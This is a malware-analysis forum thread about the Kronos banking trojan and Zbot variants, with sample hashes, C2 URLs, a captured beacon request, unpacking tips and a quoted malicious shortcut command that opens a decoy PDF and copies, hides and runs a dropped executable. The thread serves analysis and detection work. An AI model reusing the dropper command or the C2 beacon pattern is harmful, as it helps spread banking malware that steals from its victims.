Kronos

Forum for analysis and discussion about malware.
User avatar
Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Kronos

Post by Intimacygel » Tue Jul 15, 2014 1:49 pm

Hi All,

Was wondering if anyone has heard of or seen samples of the supposedly replacement for zeus "kronos"

http://www.csoonline.com/article/245363 ... um=twitter


Thanks!

Sargerras
Posts: 9
Joined: Mon May 13, 2013 12:23 pm

Re: Kronos

Post by Sargerras » Tue Aug 05, 2014 9:30 am

Hi, just show up this thread.
http://securityblog.s21sec.com/2014/08/ ... -here.html

Sample of kronos attached

MD5: f085395253a40ce8ca077228c2322010
http://www.virustotal.com/file/9806d1b6 ... /analysis/
You do not have the required permissions to view the files attached to this post.

Kafeine
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm

Re: Kronos

Post by Kafeine » Tue Jan 27, 2015 6:57 pm

A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
You do not have the required permissions to view the files attached to this post.

pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Variant of Zbot

Post by pwnslinger » Wed Nov 25, 2015 6:50 pm

Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
You do not have the required permissions to view the files attached to this post.

comak
Posts: 43
Joined: Mon Oct 14, 2013 8:25 am
Contact:

Re: Variant of Zbot

Post by comak » Thu Nov 26, 2015 11:14 am

This is Kronos,

Code: Select all

http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
cheers,
mak

User avatar
EP_X0FF
Global Moderator
Posts: 4790
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Variant of Zbot

Post by EP_X0FF » Thu Nov 26, 2015 11:33 am

pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

henices
Posts: 3
Joined: Fri Aug 01, 2014 7:29 am
Contact:

Re: Kronos

Post by henices » Thu Dec 03, 2015 2:13 am

Kafeine wrote:A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80

Code: Select all

POST /krpanel/connect.php HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) 
Host: bitcoind.su 
Content-Length: 74 
Cache-Control: no-cache  

WzW,c`cfgcgzcozccazedzeefdfdb*W
attachment is the report.
You do not have the required permissions to view the files attached to this post.

pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Re: Variant of Zbot

Post by pwnslinger » Thu Dec 03, 2015 8:07 pm

EP_X0FF wrote:
pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
Thanks EP. ;)

after dumping second stage (explorer.exe) (change EP with PUSH/RET) using EBFE method for attaching using ollydbg.
i dunno why when i wanna set toggle bp on code, olly can't and run (memry regions are RWC!)
then i used f4 (run till selection) and hw bp.
but when call SYSENTER... i can't take control back to myself.
You do not have the required permissions to view the files attached to this post.

pwnslinger
Posts: 9
Joined: Mon May 04, 2015 5:27 pm

Re: Kronos

Post by pwnslinger » Fri Feb 12, 2016 10:27 am

i got another variant of Zbot on my system today.
.rsrc section is base64 encoded. first i thought about Ranbyus banking trojan.
also a shortcut created for running malware with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

export table contains callback function. i checked it by Ida and i didn't see any useful call.
where i should start?


sample attached.
You do not have the required permissions to view the files attached to this post.

puzzlex
Posts: 20
Joined: Tue Oct 20, 2015 12:22 pm

Re: Kronos

Post by puzzlex » Fri Feb 12, 2016 1:18 pm

This DqGLtNo.exe is packed multiple times. Here it is the final payload https://www.virustotal.com/en/file/18f8 ... /analysis/
You do not have the required permissions to view the files attached to this post.

Post Reply